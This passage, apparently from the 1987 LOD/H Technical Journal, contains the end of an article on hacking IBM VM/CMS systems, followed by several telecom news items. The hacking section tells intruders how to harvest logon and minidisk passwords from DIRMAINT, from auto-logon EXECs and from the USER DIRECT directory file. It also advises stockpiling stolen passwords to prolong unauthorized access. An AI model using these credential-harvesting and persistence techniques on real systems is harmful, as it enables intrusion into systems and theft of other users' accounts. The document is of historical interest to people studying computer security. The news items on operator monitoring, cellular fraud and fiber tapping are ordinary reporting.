  3166. disk, 192 as our D disk, 19E as the systems' Y disk. Both 193 and 194 are
  3167. accessable but have not been accessed by us. Thus:
  3168.  
  3169. .ACC 193 B
  3170. B (193) R/O
  3171. .
  3172.  
  3173. Now the 193 disk is our B disk and accessable by us. You can perform the same
  3174. procedure for the 194 disk.
  3175.  
  3176.  
  3177. DIRMAINT:
  3178. ---------
  3179.  
  3180. The Directory Maintenance utility can be found on some systems. If it is
  3181. running, DIRMAINT should be a valid userid. The DIRMAINT userid is
  3182. automatically initialized when the system is started up. It remains in
  3183. Disconnected mode awaiting transactions which contain directory maintenance
  3184. commands.
  3185.  
  3186.  
  3187. If you come across a system with DIRMAINT, it will provide you with all the
  3188. information you need to know about it. A few commands are important, at least
  3189. to the hacker:
  3190.  
  3191. MDPW  This displays access passwords for one or all of that userid's minidisks.
  3192.  
  3193. .DIRM MDPW
  3194. DVHDIR005R ENTER CURRENT CP PASSWORD TO VALIDATE COMMAND OR A NULL TO EXIT:
  3195. R; T=0.12/0.15 19:33:34
  3196.  DVHMDF301I MINIDISK 191: RBUBBA     WBUBBA    MBUBBA
  3197.  DVHMDF301I MINIDISK 192: RBUBPW     BONEHEAD  MULTIBUB
  3198.  
  3199. The reason you must enter the users logon password is obvious. If someone walks
  3200. up to a users terminal and wants to know what the guys disk passwords are all
  3201. he would have to do is enter this command and would get them, except for the
  3202. fact that it does ask for the users logon password, thus, protecting the disk
  3203. passwords.
  3204.  
  3205. Help   Get more info on DIRM commands.
  3206. PW     This changes a users logon password
  3207. PW?    Find out how long it was since the user changed his logon password.
  3208. MDISK  Change access mode, change, add, or delete passwords.
  3209. LINK   Cause an automatic link, at logon, to another users minidisk.
  3210. FOR    Enter a DIRMaint command for another user if authorized.
  3211.  
  3212.  
  3213. THINGS YOU WANT:
  3214. ----------------
  3215.  
  3216. Things you want are: More valid userid's to try passwords on, actual logon
  3217. passwords, and disk access passwords. Obtaining userid's can be accomplished by
  3218. using the Q NAMES command every time you logon. Obtaining logon passwords isn't
  3219. as simple. There are a couple of places which you will want to explore.
  3220.  
  3221. The AUTOLOG1 or AUTOOP virtual machines (userid's) usually auto-logon other
  3222. userid's. Now, in order to do this they must have those users' passwords. These
  3223. are contained within various EXECs within their user directory. If you can
  3224. obtain a valid disk access password for whichever one of these is running on
  3225. your particular system, you can get more passwords and possibly some disk
  3226. access passwords for about 10 other userid's. This should allow you to get more
  3227. disk access passwords and hopefully more logon passwords. Nevertheless, having
  3228. obtained a few more passwords, and not using them until the original one you
  3229. hacked dies, will greatly extend your stay on the system.
  3230.  
  3231. EXEC files from any user may contain more disk access passwords for other users
  3232. and those users directories may contain EXECs which have more passwords, and
  3233. so on. Of course many other types of files may contain this type of
  3234. information.
  3235.  
  3236. The CP directory, this is similar to a big bullseye on a target. This
  3237. directory, as previously explained contains users' passwords, various system
  3238. information and minidisk passwords. The directory usually goes under the
  3239. filename/filetype of USER DIRECT. It can be anywhere on the system, and can
  3240. have a different name which in my view would add to system security. It is
  3241. usually found in either or both of two users' directorys which I leave to you
  3242. to find (sorry). This is a very big weakness in CMS due to the fact that if you
  3243. can find what userid the directory is in, and it's disk access password, you've
  3244. got the system by the balls. The file may also have a filetype of INDEX which
  3245. is a compilation or sorting of pertinent information used for speeding up
  3246. various procedures the system carries out constantly. A typical entry in the
  3247. USER DIRECT file would look like:
  3248.  
  3249. USER BUBBA BUBAPASS 1M 3M BG
  3250.  
  3251. VMU01000
  3252.  ACCOUNT 101 SYSPROG
  3253.  
  3254. VMU01010
  3255.  IPL CMS
  3256.  
  3257. VMU01020
  3258.  CONSOLE 00D 3215
  3259.  
  3260. VMU01030
  3261.  SPOOL 00C 2540 READER *
  3262.  
  3263. VMU01040
  3264.  SPOOL 00D 2540 PUNCH *
  3265.  
  3266. VMU01050
  3267.  SPOOL 00E 1403 A
  3268.  
  3269. VMU01060
  3270.  LINK MAINT 190 190 RR
  3271.  
  3272. VMU01070
  3273.  LINK MAINT 19D 19D RR
  3274.  
  3275. VMU01080
  3276.  LINK MAINT 19E 19E RR
  3277.  
  3278. VMU01090
  3279.  MDISK 191 3350 152 003 VMPK01 MR RBUBBA WBUBBA   MBUBBA
  3280.  MDISK 192 3350 152 003 VMPK01 MR RBUBPW BONEHEAD MULTIBUB
  3281.  
  3282. VMU01100
  3283. *
  3284.  
  3285.  
  3286. The first line gives the userid of BUBBA, password BUBAPASS, 1 and 3 Megs of
  3287. virtual memory, and Privilege Classes B and G. The next line gives the account
  3288. number and department or owner of the account. The next few lines define
  3289. miscellaneous system information. Next, three lines of what disks should be
  3290. automatically linked to upon logon. And finally the minidisk (MDISK) virtual
  3291. addresses and corresponding passwords.
  3292.  
  3293.  
  3294. CONCLUSION:
  3295. -----------
  3296.  
  3297. As usual, there is always more I could add to an article like this one. I did
  3298. not want to keep writing part after part so I wrote a 'complete' article on
  3299. Hacking VM/CMS. I apologize for its length of over 50K but I wanted to mention
  3300. everything you needed to become familiar with the Operating System and its
  3301. Security/Insecurity. I intentionally 'forgot' to mention various information
  3302. which would put sensitive and destructive information in the hands of anyone
  3303. who reads this article. The information within this article can and will be
  3304. different from system to system so don't take anything too literally. This
  3305. article is comprised: 80% information from actual system use, 10% CMS help
  3306. files, and 10% from various CMS documentation. I may write a followup article
  3307. of shorter length as more people become familiar with CMS.
  3308.  
  3309. Lex Luthor
  3310.  
  3311. The LOD/H Technical Journal: File #10 of 10
  3312.  
  3313.  
  3314.                              Network News & Notes
  3315.  
  3316.  
  3317. -------------------------------------------------------------------------------
  3318.  
  3319. CWA Backs Bill To Ban Secret Telephone Monitoring (Communications Week 4/13/87)
  3320.  
  3321.  
  3322.      The Communications Workers of America threw itself into the thick of a
  3323. growing congressional debate on privacy protections for workers by launching a
  3324. campaign to enact legislation prohibiting secret monitoring of telephone
  3325. operators. The union has for years attempted unsuccessfully to stop
  3326. telephone companies from listening to operators for performance assessments.
  3327.  
  3328.      The union estimated that over 200,000 operators at AT&T & local operating
  3329. companies are under surveillance. Third-party monitoring of telephone calls is
  3330. illegal under the 1968 Wiretap Act, but a provision in the law lets employers
  3331. listen in on worker conversations.
  3332.  
  3333.      For many years, only the telephone companies had the ability to monitor
  3334. employees. Today, with the development of electronic telephone gear and
  3335. computers, the practice has spread to health and insurance company personnel,
  3336. the IRS and airline and hotel reservation representatives.
  3337.  
  3338.      Telephone company officials said they had not yet determined their
  3339. position on the bill, but they stressed that monitoring was necessary to ensure
  3340. that operators maintain performance standards. "In the competitave world AT&T
  3341. faces, the name of the game is how well you treat the customer," said an AT&T
  3342. spokeswoman. "We make spot checks to ensure the quality of service.
  3343.  
  3344.      CWA president Morton Bahr argued at a news conference that monitoring does
  3345. not improve service. "The assumption by many employers that supervision must be
  3346. conducted secretly, or else the worker will quit trying, is both unfair and
  3347. contradits all available evidence," he said.
  3348.  
  3349.      The stress of being under surveillance by supervisors and computers often
  3350. causes operators to develop stress-related illnesses, such as nervous
  3351. conditions, anxiety, depression and ulcers, union officials said. Even the time
  3352. operators take to use the bathroom is calculated.
  3353.  
  3354. -------------------------------------------------------------------------------
  3355.  
  3356. Crime Doesn't Pay (Communications Week 4/13/87)
  3357.  
  3358.      Those 18 cellular telephone abusers recently arrested in New York on
  3359. charges of illegally altering memory chips so they could make calls free of
  3360. charge would not have been able to bilk carriers had the companies been using
  3361. cellular phones from AUDIOVOX CORP., Hauppauge, N.Y. Audiovox president John
  3362. Shalam said his company's phones contain a mechanism built into the software
  3363. that blocks alteration of the phone's electronic serial number, or ESN. "If
  3364. someone attempts to change the ESN, the phone will not activate," Shalam said.
  3365. The cellular suspects apparently changed their ESNs, causing other users to be
  3366. billed for the offender's calls. FBI agents estimated that local mobile
  3367. telephone companies are losing approximately $40,000 per month, or about $3
  3368. million nationally, because of cellular fraud.
  3369.  
  3370. -------------------------------------------------------------------------------
  3371.  
  3372.  
  3373. US Sprint Initiates Operator Services (Communications Week 4/13/87)
  3374.  
  3375.  
  3376.      US Sprint Communications Co. has quietly become the first major long
  3377. distance company other than AT&T to offer its own nationwide collect calling,
  3378. third-party billing and other operator services.
  3379.      US Sprint's initiation of operator services early this year was made
  3380. possible by a multiyear agreement with National Data Corp. The Sprint program
  3381. puts a small dent in AT&T's marketing claims that they provide value-added
  3382. services its competitors cannot equal.
  3383.      Before Sprint began offering the nationwide program, only AT&T offered
  3384. large-scale operator services to its customers. MCI Communications Corp. has
  3385. been conducting a limited operator services trial exclusively in Topeka Kansas,
  3386. for about two years but has no immmediate plans to expand the service to other
  3387. cities.
  3388.      National Data is primarily a transaction processing copmany, specializing
  3389. in credit card authorizations via voice or data lines. Operators handling
  3390. Sprint's collect and third-party traffic will also be spending some of their
  3391. time handling credit card authorizations.
  3392.      Calls from a US Sprint customer to an operator are automatically turned
  3393. over to National Data's operator centers in Atlanta; Cherry Hill, NJ.; Lombard
  3394. Ill.; Miami; Sparks, Nevada; and Toronto, following directions from software
  3395. developed for the long distance company's switches by National Data and
  3396. Rockwell International Corp.
  3397.      National Data is currently negotiating with about 20 other regional and
  3398. national long distance companies to provide the same sorts of services to them
  3399. as the company does for US Sprint.
  3400.  
  3401. -------------------------------------------------------------------------------
  3402.  
  3403. WARNING: Fiber Cable Is Not Tap Proof (Communications Week (4/13/87)
  3404.  
  3405.      Until recently, companies and government agencies were little concerned
  3406. about clandestine siphoning of data from fiber optic networks.
  3407.      Because of the technology involved-lightwaves-fiber is considerable more
  3408. difficult to eavesdrop on than copper wire. Many telecommunications users,
  3409. however, have mistakenly assumed this to mean that fiber is tap-proof.
  3410.      Recent tests conducted by federal agencies, such as the NSA, CIA, and FBI
  3411. have debunked the tap proof myth.
  3412.      Security of voice and data transmitted via fiber is an increasingly
  3413. crucial issue as use of fiber optical local area networks grows within the
  3414. government. Civilian agencies have committed themselves to upgrading their
  3415. on-premises networks by installing fiber. The military too, is developing more
  3416. applications for fiber optics.
  3417.      Encryption, while a common method of protecting military and State Dept.
  3418. secrets, is expensive. While signal encryption is used mostly for classified
  3419. defense communications, many other types of government data are not encoded.
  3420.      Security is a matter of definition. Fiber is secure in that it is
  3421. resistant to simple methods of tapping. To tap it, you have to be much more
  3422. sophisticated. Virtually anyone who can lift a manhole cover has access to
  3423. leased lines.
  3424.      Indeed, the government says fiber's security advantages include its
  3425. immunity to jamming, electromagnetic interference and electromagnetic pulses.
  3426.      Counter-intrusion equipment is designed to monitor and detect any breach
  3427. in optical transmission, using the principle that at least some loss in a
  3428. lightwave signal will occur if a fiber line is tapped. Such equipment also
  3429. enables a rapid pinpointing of where the intrusion is being made on the cable.
  3430.  
  3431.  
  3432.